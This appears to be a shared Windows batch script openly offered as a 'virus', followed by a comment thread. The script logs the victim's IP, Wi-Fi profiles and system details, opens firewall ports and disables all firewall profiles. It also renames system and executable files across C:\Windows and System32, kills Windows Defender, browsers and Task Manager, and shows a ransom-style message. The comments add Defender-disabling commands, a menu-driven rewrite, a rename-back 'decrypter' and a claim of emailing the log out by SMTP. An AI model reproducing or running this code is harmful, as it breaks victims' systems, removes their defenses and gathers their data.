| @echo off | |
| title %random% %date% %username% %time% %random% | |
| color 0a | |
| ren -=- Writes INFO to a .LOG file in Current Directory -=- | |
| :info | |
| cls & color 0a | |
| cd Desktop | |
| nslookup myip.opendns.com resolver1.opendns.com>9K21JM10B.log | |
| ver>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| ECHO Username:%username%>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| ECHO Time: %time%>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| ECHO Date: %date%>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| netsh wlan show profiles>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| ipconfig>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| ECHO Additional Information:>>9K21JM10B.log | |
| ipconfig | find /i "IPv4">>9K21JM10B.log | |
| wmic diskdrive get size>>9K21JM10B.log | |
| wmic cpu get name>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| ECHO.>>9K21JM10B.log | |
| systeminfo>>9K21JM10B.log | |
| goto ports | |
| ren -=- Opens Port 1122 -=- | |
| :ports | |
| cls & color 0a | |
| netsh advfirewall firewall add rule name="Port 1122 TCP" dir=in action=allow protocol=TCP localport=%1 | |
| netsh advfirewall firewall add rule name="Port 1122 UDP" dir=in action=allow protocol=UDP localport=%1 | |
| goto firewall | |
| ren -=- Turns all Firewalls off -=- | |
| :firewall | |
| cls & color 0a | |
| netsh firewall set opmode disable | |
| netsh firewall set opmode mode=DISABLE | |
| netsh advfirewall set currentprofile state off | |
| netsh advfirewall set domainprofile state off | |
| netsh advfirewall set privateprofile state off | |
| netsh advfirewall set publicprofile state off | |
| netsh advfirewall set allprofiles state off | |
| goto encryption | |
| ren -=- Encrypts files with a simple name break -=- | |
| :encryption | |
| cls & color 0a | |
| :Current | |
| REN *.cmd *.sI09 | |
| REN *.exe *.1Je9 | |
| REN *.log *.439a | |
| REN *.ini *.3KM1 | |
| REN *.dll *.38Jl | |
| REN *.bin *.3J81 | |
| REN *.txt *.2M1A | |
| REN *.sys *.8j3J | |
| REN *.lnk *.9K2M | |
| REN *.png *.8J2n | |
| REN *.exe *.3hxD | |
| cd C:\Windows | |
| REN *.cmd *.sI09 | |
| REN *.exe *.1Je9 | |
| REN *.log *.439a | |
| REN *.ini *.3KM1 | |
| REN *.dll *.38Jl | |
| REN *.bin *.3J81 | |
| REN *.txt *.2M1A | |
| REN *.sys *.8j3J | |
| REN *.lnk *.9K2M | |
| REN *.png *.8J2n | |
| REN *.exe *.3hxD | |
| cd C:\Windows\Sys32 & cd C:\Windows\System32 | |
| REN *.cmd *.sI09 | |
| REN *.exe *.1Je9 | |
| REN *.log *.439a | |
| REN *.ini *.3KM1 | |
| REN *.dll *.38Jl | |
| REN *.bin *.3J81 | |
| REN *.txt *.2M1A | |
| REN *.sys *.8j3J | |
| REN *.lnk *.9K2M | |
| REN *.png *.8J2n | |
| REN *.exe *.3hxD | |
| cd C:\ | |
| REN *.cmd *.sI09 | |
| REN *.exe *.1Je9 | |
| REN *.log *.439a | |
| REN *.ini *.3KM1 | |
| REN *.dll *.38Jl | |
| REN *.bin *.3J81 | |
| REN *.txt *.2M1A | |
| REN *.sys *.8j3J | |
| REN *.lnk *.9K2M | |
| REN *.png *.8J2n | |
| REN *.exe *.3hxD | |
| color 0a & mode 1000 & cls | |
| pause | |
| goto virus | |
| ren -=- Closes all task managers and browser, kills anti-virus and firewall -=- | |
| :virus | |
| ECHO You have been encrypted by *-*7_SL*- & color 0a | |
| net stop "Windows Defender Service" | |
| net stop "Windows Firewall" | |
| taskkill /F /IM "chrome.exe" /T | |
| taskkill /F /IM "firefox.exe" /T | |
| taskkill /F /IM "ProcessHacker.exe" /T | |
| taskkill /F /IM "explorer.exe" /T | |
| taskkill /F /IM "taskmgr.exe" /T | |
| goto virus |
oh
I guess it is a trojan rather than a virus because it writes information onto a log file about the victim. Nice
wat does it do
it takes files
wat does it do
It makes you a sandwich
Where does it put the information
I guess it is a trojan rather than a virus because it writes information onto a log file about the victim. Nice
not only write the user's data in a notepad, it also encrypts all data, destroys all security systems and opens ports 1122, you just have to read the comments in the middle of the code
So why did it open port 1122?
do it!
Virussssssssssssssssssssssssssssssssss!
Where does the data go?
wat does it do
it takes files and makes them go boom
Solve The Problem
- Flip Code:
- Example:
- Before:
@ECHO OFFren *.exw *.mu12mrename *.exw *.mu12m- ! It Will Rename All File Encoded With .exw To .mu12m ! (Encrypter)
- After:
@ECHO OFFren *.mu12m *.exwrename *.mu12m *.exw- ! It Will Rename All File Encoded With .mu12m To .exw ! (Decrypter)
Decrypter Program
Copy and paste in notepad and save as batch file
@echo off
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN *.3hxD *.exe
cd C:\Windows
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN .3hxD.exe
cd C:\Windows\Sys32 & cd C:\Windows\System32
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN *.3hxD *.exe
cd C:
REN *.sI09 *.cmd
REN *.1Je9 *.exe
REN *.439a *.log
REN *.3KM1 *.ini
REN *.38Jl *.dll
REN *.3J81 *.bin
REN *.2M1A *.txt
REN *.8j3J *.sys
REN *.9K2M *.lnk
REN *.8J2n *.png
REN *.3hxD *.exe
Decrypter Program
Copy and paste in notepad and save as batch file
@echo off REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C:\Windows REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN .3hxD.exe cd C:\Windows\Sys32 & cd C:\Windows\System32 REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C: REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe
no encrypt & no decrypt
it's just change files format
Nice
Decrypter Program
Copy and paste in notepad and save as batch file
@echo off REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C:\Windows REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN .3hxD.exe cd C:\Windows\Sys32 & cd C:\Windows\System32 REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exe cd C: REN *.sI09 *.cmd REN *.1Je9 *.exe REN *.439a *.log REN *.3KM1 *.ini REN *.38Jl *.dll REN *.3J81 *.bin REN *.2M1A *.txt REN *.8j3J *.sys REN *.9K2M *.lnk REN *.8J2n *.png REN *.3hxD *.exeno encrypt & no decrypt it's just change files format
really
bro title its %time% problem
I added a new code to my batch file:
net stop WinDefend
sc config "WinDefend" start= disabled
This code will turn Windows Defender into a toast.
how to remove virus
wat does it do
The first part of the script creates a log file in the Desktop folder that contains information about the user's computer, including the IP address, network configuration, and hardware information.
The next part of the script opens Port 1122 and turns off firewalls, which can be used to allow unauthorized access to the computer.
The subsequent part of the script renames all files with a certain extension in the C:\Windows, C:\Windows\Sys32, and C:\Windows\System32 folders. This can render the system unstable and potentially cause data loss.
Finally, the script closes all task managers, browsers, and anti-virus software and kills the Windows Defender Service and Windows Firewall. This can allow malicious software to infect the computer without being detected.
In this updated version of the script, a menu is displayed with four options. You can enter a choice (1, 2, 3, or 4) to perform different actions. The script then jumps to the corresponding section based on your input.
- If you select option 1, the script gathers system information as before and then returns to the menu.
- If you select option 2, the script prompts you to enter a port number. It then manipulates the firewall settings to allow TCP and UDP traffic on that port before returning to the menu.
- If you select option 3, the script proceeds with the file encryption process, as in the original script, before returning to the menu.
- If you select option 4, the script exits.
This interactive menu allows you to choose the desired action and provides a more flexible and user-friendly experience. Feel free to further customize and modify the script according to your specific needs.
@echo off
title %random% %date% %username% %time% %random%
color 0a
:menu
cls
echo 1. Gather System Information
echo 2. Manipulate Firewall Settings
echo 3. Encrypt Files
echo 4. Exit
set /p choice=Enter your choice:
if "%choice%"=="1" goto info
if "%choice%"=="2" goto ports
if "%choice%"=="3" goto encryption
if "%choice%"=="4" exit
:info
cls & color 0a
cd Desktop
REM Gather system information
nslookup myip.opendns.com resolver1.opendns.com>9K21JM10B.log
ver>>9K21JM10B.log
ECHO.>>9K21JM10B.log
ECHO Username:%username%>>9K21JM10B.log
ECHO.>>9K21JM10B.log
ECHO Time: %time%>>9K21JM10B.log
ECHO.>>9K21JM10B.log
ECHO Date: %date%>>9K21JM10B.log
ECHO.>>9K21JM10B.log
netsh wlan show profiles>>9K21JM10B.log
ECHO.>>9K21JM10B.log
ipconfig>>9K21JM10B.log
ECHO.>>9K21JM10B.log
ECHO Additional Information:>>9K21JM10B.log
ipconfig | find /i "IPv4">>9K21JM10B.log
wmic diskdrive get size>>9K21JM10B.log
wmic cpu get name>>9K21JM10B.log
ECHO.>>9K21JM10B.log
ECHO.>>9K21JM10B.log
ECHO.>>9K21JM10B.log
systeminfo>>9K21JM10B.log
pause
goto menu
:ports
cls & color 0a
set /p port=Enter the port number:
REM Manipulate firewall settings
netsh advfirewall firewall add rule name="Port %port% TCP" dir=in action=allow protocol=TCP localport=%port%
netsh advfirewall firewall add rule name="Port %port% UDP" dir=in action=allow protocol=UDP localport=%port%
pause
goto menu
:encryption
cls & color 0a
:Current
REM Encrypt files
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows\Sys32 & cd C:\Windows\System32
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
color 0a & mode 1000 & cls
pause
goto menu
Nice scripts but i wrote a little bit more code and now it sends me the file, with help from an Smtp Server, to my email adress.
what
im running windows sandbox
Ładne skrypty, ale napisałem trochę więcej kodu i teraz wysyła mi plik, z pomocą serwera Smtp, na mój adres e-mail.
how? In batch u can only send in FTP
in sense - files
wat does it do